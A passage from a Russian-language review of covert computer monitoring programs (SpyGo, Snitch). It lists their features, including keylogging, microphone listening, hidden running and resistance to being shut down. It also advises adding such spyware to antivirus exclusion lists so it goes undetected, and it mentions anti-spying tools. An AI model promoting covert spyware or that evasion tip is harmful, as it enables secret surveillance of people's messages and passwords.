  • прослушивание окружающей обстановки (при наличии микрофона);
  • мониторинг системных событий (время включения и выключения компьютера, простои в работе, подключение флешек, дисков и прочее).

Важно! К недостаткам SpyGo, по мнению пользователей, можно отнести то, что он поддерживает не все версии Windows, при отправке отчетов нередко выбрасывает ошибки и довольно легко демаскируется.

Snitch

Snitch - название этой программы переводится, как «стукач», причем очень недоброжелательно настроенный к пользователю. Snitch шпионит за действиями на компьютере. Работает скрыто, не требует сложных настроек и мало влияет на быстродействие системы.

Программа выпускается в единственной версии.

Возможности и особенности Snitch:

  • мониторинг клавиатуры, буфера обмена, системных событий, веб-серфинга и общения в мессенджерах;
  • составление сводных отчетов и графиков контролируемых событий;
  • нетребовательность к сетевой конфигурации;
  • защита от несанкционированного завершения процесса программы;
  • наблюдение ведется даже при отсутствии выхода в сеть.

Из недостатков можно заметить конфликты с антивирусами

Как обнаружить шпиона на компьютере?

Найти программу-шпион на компьютере, которая внешне никак себя не проявляет, сложно, но можно.

Так, несмотря на легитимность, рассмотренные нами приложения могут распознать специальные антивирусы, «заточенные» под поиск spyware (троянов с функцией шпионажа), поэтому рекомендуем добавлять установленную программу в список исключений таких антивирусов.

А если вам не требуется удалять шпион, а нужно только замаскировать от него свои действия, можете воспользоваться средствами защиты от шпионажа, которые, несмотря на активную слежку за вами, воспрепятствуют перехвату событий клавиатуры и снимкам экрана.

Тогда ваша переписка и пароли не попадут в чужие руки.